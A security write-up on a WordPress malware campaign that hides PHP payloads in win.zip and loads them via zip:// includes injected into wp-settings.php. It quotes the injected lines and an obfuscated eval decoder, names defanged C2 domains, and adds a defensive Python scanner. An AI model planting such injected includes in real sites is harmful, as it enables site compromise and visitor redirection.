In July 2025, cybersecurity researchers identified a sophisticated malware campaign targeting WordPress websites. This campaign employs advanced obfuscation techniques and stealthy persistence methods to redirect unsuspecting visitors to malicious domains while simultaneously conducting search engine optimization (SEO) poisoning operations.
Initial Compromise and Code Injection
The attack begins with the compromise of WordPress core files, specifically targeting the critical `wp-settings.php` component. Once access is gained, attackers inject malicious code that leverages PHP’s `zip://` wrapper functionality to execute hidden payloads. This approach allows the malware to remain virtually undetected by traditional security scanners, as the malicious code is stored within what appears to be an innocuous ZIP archive file named `win.zip`.
Malware Objectives and SEO Manipulation
Beyond simple redirection schemes, the malware orchestrates a comprehensive attack on search engine rankings through unauthorized content injection, sitemap manipulation, and the creation of spam-laden pages designed to boost malicious websites in search results. The infection demonstrates remarkable sophistication in its ability to differentiate between human visitors and automated bots, ensuring that search engine crawlers encounter benign content while real users are subjected to malicious redirects.
Discovery and Analysis
Sucuri analysts identified the malware after investigating persistent redirect issues reported by a client, leading to the discovery of this multi-layered threat. The researchers noted that the malware employs dynamic Command and Control (C2) server selection, with different C2 domains activated based on specific URL patterns accessed by visitors.
ZIP Archive Inclusion Mechanism
The malware’s most innovative feature lies in its exploitation of PHP’s `zip://` stream wrapper for code inclusion. The initial payload, injected into `wp-settings.php`, contains two critical lines that establish the infection framework:
```php
// Injected into wp-settings.php: strip a leading "www." from the request's Host header ...
$h = str_replace('www.', '', $_SERVER['HTTP_HOST']);
// ... and include the archive member of that name straight out of win.zip via the zip:// wrapper
include('zip://win.zip#' . $h);
```
This code extracts the domain name from the `HTTP_HOST` header and uses it to include a file directly from within the `win.zip` archive. This technique bypasses traditional file-based detection methods since the malicious code resides within a compressed container rather than as standalone PHP files.
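The two artifacts described above (an include that pulls code through a stream wrapper, and a ZIP archive whose members are really PHP named after a hostname) are both visible on disk, so they can be hunted for directly. The scanner below is an added example written for this write-up, not Sucuri's tooling; the sample site it builds is constructed in a temporary directory and contains only the two injected lines quoted above plus a placeholder archive member.

```python
import os
import re
import tempfile
import zipfile

# include/require whose path goes through a PHP stream wrapper (zip://, phar://, ...)
WRAPPER_INCLUDE = re.compile(
    rb"\b(?:include|require)(?:_once)?\b[^;\n]*?\b(zip|phar|data|compress\.zlib)://",
    re.IGNORECASE)
# a ZIP member that opens a PHP tag or calls eval() is code, not data
PHP_MEMBER = re.compile(rb"<\?php|\beval\s*\(", re.IGNORECASE)

def scan_wordpress_root(root):
    """Return (path, reason) findings: wrapper includes in .php files, PHP hidden in .zip members."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.endswith(".php"):
                with open(path, "rb") as fh:
                    for lineno, line in enumerate(fh, 1):
                        m = WRAPPER_INCLUDE.search(line)
                        if m:
                            findings.append((path, f"line {lineno}: include via "
                                             f"{m.group(1).decode()}:// wrapper"))
            elif name.endswith(".zip") and zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as zf:
                    for info in zf.infolist():
                        if info.is_dir(): continue
                        with zf.open(info) as member:
                            head = member.read(4096)  # the opening bytes are enough
                        if PHP_MEMBER.search(head):
                            findings.append((path, f"member {info.filename!r} contains PHP code"))
    return findings

def build_sample_site():
    """Constructed stand-in for an infected site (no real malware): the two injected
    wp-settings.php lines from the write-up plus a win.zip with a hostname-named member."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    with open(os.path.join(root, "wp-settings.php"), "w") as fh:
        fh.write("<?php\n// normal bootstrap code would precede this\n"
                 "$h = str_replace('www.', '', $_SERVER['HTTP_HOST']);\n"
                 "include('zip://win.zip#' . $h);\n")
    with open(os.path.join(root, "wp-load.php"), "w") as fh:  # benign include, must not be flagged
        fh.write("<?php\nrequire_once ABSPATH . 'wp-config.php';\n")
    with zipfile.ZipFile(os.path.join(root, "win.zip"), "w") as zf:
        zf.writestr("example.com", "<?php\n// placeholder for the obfuscated payload\n")
        zf.writestr("readme.txt", "plain text member, must not be flagged\n")
    return root
```

Run `scan_wordpress_root()` against a real document root to get one finding per wrapper include and per code-bearing archive member; the hostname-named member is the tell, since legitimate archives rarely contain extensionless files that begin with `<?php`.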
Obfuscation and Persistence
Upon extraction, the ZIP archive reveals heavily obfuscated PHP code structured as:
```php
$encode = $b3($string);          // first decoding stage; the function names are held in variables
$string1 = $b2($b4($encode));    // two further stages yield the plaintext PHP payload
echo eval('?>' . $string1);      // '?>' leaves PHP mode so the payload's own <?php tag is honoured
```
The malware establishes persistence through environment manipulation, setting extended execution timeouts and implementing anti-bot detection mechanisms. It dynamically selects from multiple C2 servers, including domains such as `wditemqy[.]enturbioaj[.]xyz` and `oqmetrix[.]icercanokt[.]xyz`, depending on the requested URL path. This distributed C2 architecture enhances the malware’s resilience against takedown efforts while enabling targeted content delivery based on visitor behavior patterns.
Broader Context of WordPress Exploitation
This incident is part of a broader trend where threat actors exploit vulnerabilities in WordPress websites to distribute malware. For instance, in October 2024, over 6,000 WordPress sites were hacked to install malicious plugins that displayed fake software updates, leading to the installation of information-stealing malware. These campaigns, known as ClearFake and ClickFix, utilized stolen admin credentials to install plugins that appeared legitimate but contained embedded malicious scripts. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/over-6-000-wordpress-hacked-to-install-plugins-pushing-infostealers/?utm_source=openai))
Similarly, in January 2022, a massive supply chain attack compromised 93 WordPress themes and plugins, inserting a backdoor that granted threat actors full access to websites. This attack affected over 360,000 active websites and was discovered by researchers at Jetpack. ([bleepingcomputer.com](https://www.bleepingcomputer.com/news/security/over-90-wordpress-themes-plugins-backdoored-in-supply-chain-attack/?utm_source=openai))
In April 2025, a new malware variant disguised as a legitimate WordPress plugin was uncovered. Named WP-antymalwary-bot.php, this malware provided attackers with persistent access to infected websites, allowing them to inject malicious code and serve remote advertisements to site visitors. The malware maintained persistence through a modified `wp-cron.php` file, which reinstated the malicious plugin if deleted. ([infosecurity-magazine.com](https://www.infosecurity-magazine.com/news/wordpress-malware-masquerades/?utm_source=openai))
Recommendations for WordPress Administrators
Given the increasing sophistication of these attacks, WordPress administrators are advised to:
- Regularly Audit Installed Plugins and Themes: Ensure that all plugins and themes are up to date and obtained from reputable sources. Remove any unused or suspicious files.
- Monitor for Unauthorized Changes: Implement file integrity monitoring to detect unexpected modifications to core files such as `wp-settings.php`.
- Enhance Access Controls: Use strong admin credentials, enable multi-factor authentication (MFA), and limit the number of users with administrative privileges.
- Implement Security Plugins and Firewalls: Use security plugins that can detect and block malicious activity, and configure web application firewalls to filter out malicious traffic.
- Conduct Regular Backups: Maintain routine off-site backups to ensure quick recovery in case of an attack.
By adopting these proactive security measures, website administrators can significantly reduce the risk of their WordPress sites being compromised by such sophisticated malware campaigns.